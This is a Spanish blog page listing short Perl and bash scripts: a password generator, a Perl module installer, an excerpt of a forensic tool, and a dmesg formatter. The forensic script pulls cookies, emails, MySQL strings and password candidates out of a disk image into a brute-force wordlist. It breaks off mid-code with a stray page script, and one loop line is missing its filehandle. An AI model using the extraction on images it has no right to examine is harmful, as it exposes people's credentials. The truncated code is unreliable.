   $skipThisOne = 1 
      if (!($pass =~ /[A-Z]/) and ($firstUpper or $mixedCase));
   # If any test fails get another password.
   if ($skipThisOne) {
      $j--;
      next;
   }

   # Check the password length.
   $pass = substr($pass,0,$realSize) if (length($pass) > $realSize);

   # Print the passwords in a single column or across
   # the screen based on $down which is set based on the
   # the value of $across.
   if ($down ne "\n") {
      # Don't wrap passwords or trailing whitespace.
      if ($linelen + length($pass) + length($down) > 79) {
         print "\n";
         $linelen = 0;
      }
      $linelen += length($pass) + length($down);
   }
   print "$pass$down";
}
# Be sure to end the last line with an end of line.
print "\n" if $down ne "\n";

Asignamos permiso de ejecución: chmod +x Password.pl 

Ejecutamos el Script: ./Password.pl
Leer más...
Publicado por Unknown en 14:10 2 comentarios
Etiquetas: , , , , , , ,

Script para instalar paquetes en Perl

d
Autor: @Desconocido
Descripción: Script que nos permite instar paquetes Perl

#!/bin/bash
# Script para instalar paquetes en Perl.
 
function getch()
{
 OLD_STTY=`stty -g`
 stty cbreak -echo
 look=`dd if=/dev/tty bs=1 count=1 2>/dev/null`
 stty $OLD_STTY
}
 
function installModule()
{
 sudo perl Makefile.PL
 sudo make
 sudo make test
 sudo make install
} 
 
function modins()
{
 archivo=
 select archivo in *.tar.gz "SALIR"
 do
  if [ "${archivo}" = "SALIR" ]
  then
 
   exit 0;
 
  elif [[ -n "${archivo}" ]]
  then
 
   echo -e "Elegiste : ${archivo}";
   tar zxvf "${archivo}" &> /dev/null || {
    echo -e "Error descomprimiendo [ ${archivo} ]";
    exit 1;
   }
 
   cd "${archivo%\.tar.gz}" 2> /dev/null || {
       echo -e "\aError abriendo directorio ${archivo%%.*}";
       exit 1;
      } 
 
   installModule;
 
   echo -e "\E[31;47mMódulo instalado. Presione una tecla para continuar.";
   tput sgr0;
   getch;
   break;
 
  else
 
   echo -e "Error eligiendo archivo.";
   exit 0;
 
  fi
 
 done
}
 
modins;
exit 0;
Leer más...
Publicado por Snifer en 15:35 0 comentarios
Etiquetas: , ,

Introducción a la informática forense con Perl

d
Autor: @Xianur0
Para saber mas sobre el script click Aquí
Correo: xianur0.null[at]gmail.com
Descripción: Script en Perl que permite realizar un análisis forense a partir de una imagen dd 
#!/usr/bin/perl
# By Xianur0
# xianur0.null[at]gmail.com
$imagen = $ARGV[0] || die("Uso: $1 imagen.dd\n");
open BIN,$imagen;
my %uris = ();
my %disks = ();
my %bookmarks = ();
my %cookies = ();
my %emails = ();
my %volumenes = ();
my %mysqls = ();
my %proxys = ();
my $bookmark = "";
my $nbookmark = "";
my @lineas = ();
my $lineabin = "";
my $minpass = 5;
my $maxpass = 20;
my $todo = "";
my $grabar = 0;
sub ascii2char($)
{
	(my $str = shift) =~ s/@([0-9]{2})@/chr($1)/eg;
	return $str;
}
sub hex2ascii($)
{
	(my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
	return $str;
}
open PASSWORD,">resultados/passwords.txt";
open MYSQL,">resultados/mysql.txt";
open URI,">resultados/uri.txt";
open COOKIE,">resultados/cookies.txt";
open BOOKMARKS,">resultados/bookmarks.txt";
open VOLUMEN,">resultados/volumenes.txt";
open DISK,">resultados/disks.txt";
open EMAIL,">resultados/emails.txt";
open PROXY,">resultados/proxys.txt";
open ENCRYPTED,">resultados/encrypted.txt";
open BRUTE,">resultados/bruteforce.txt";
open STRINGS,">resultados/strings.txt";
print "Extrayendo datos...\n";
while($lineabin = ) {
	@lineas = ($lineabin =~ m/([\w\d&\*<>=\-\_\[\]\s"'\/\\\%;\:\.\t\,\#\)\(\@\?\0`]+)/g);
	BUCLE: foreach $linea (@lineas) {
		$linea =~ s/\0//g;
		next BUCLE if(length($linea) < 4);
		print STRINGS $linea."\n";
		if(length($linea) >= $minpass && length($linea) <= $maxpass && $linea !~ /^(\s|\t)+$/) {
			print BRUTE $linea."\n";
		}
		if($nbookmark ne "") {
			if($linea =~ /(<|>)/) {
				$bookmark .= $linea;
			} else {
				$bookmarks{$nbookmark} = $bookmark;
				$nbookmark = "";
				$bookmark = "";
			}
		}
		if($linea =~ /((https?|file|ftp|smb):\/\/.+)/) {
			my $uri = $1;
			$uri =~ s/\s+.+//g;
			print URI $uri."\n" if($uris{$uri} < 1 || $uris{$uri} eq "");
			$uris{$uri}++;
		}
		if($linea =~ /(\/dev\/disk\/by-id\/(.+))/) {
			my $disk = $1;
			print DISK $disk."\n" if($disks{$disk} < 1 || $disks{$disk} eq "");
			$disks{$disk}++;
		}
		if($linea =~ /<\/?bookmark(\shref=[^>]+)?>/) {
			if($nbookmark ne "") {
				print BOOKMARKS $bookmark."\n" if($bookmarks{$nbookmark} < 1 || $bookmarks{$nbookmark} eq "");
				$bookmarks{$nbookmark}++;
				$nbookmark = "";
				$bookmark = "";
			}
			elsif($linea =~ /createSummaryAndThumb("summary815538149022121675");
Leer más...
Publicado por Unknown en 13:02 0 comentarios
Etiquetas: , ,

dmesg más fácil de leer

d
Autor: Linuxaria.com
Descripción: Script que hace más amigable la salida del comando dmesg.

#!/usr/bin/perl
 
use strict;
use warnings;
 
my @dmesg_new = ();
my $dmesg = "/bin/dmesg";
my @dmesg_old = `$dmesg`;
my $now = time();
my $uptime = `cat /proc/uptime | cut -d"." -f1`;
my $t_now = $now - $uptime;
 
sub format_time {
 my @time = localtime $_[0];
 $time[4]+=1;    # Adjust Month
 $time[5]+=1900;    # Adjust Year
 return sprintf '%4i-%02i-%02i %02i:%02i:%02i', @time[reverse 0..5];
}
 
foreach my $line ( @dmesg_old )
{
 chomp( $line );
 if( $line =~ m/\[\s*(\d+)\.(\d+)\](.*)/i )
 {
 # now - uptime + sekunden
 my $t_time = format_time( $t_now + $1 );
 push( @dmesg_new , "[$t_time] $3" );
 }
}
 
print join( "\n", @dmesg_new );
print "\n";
Leer más...
Publicado por Unknown en 19:47 0 comentarios
Etiquetas: , , ,
Suscribirse a: Entradas (Atom)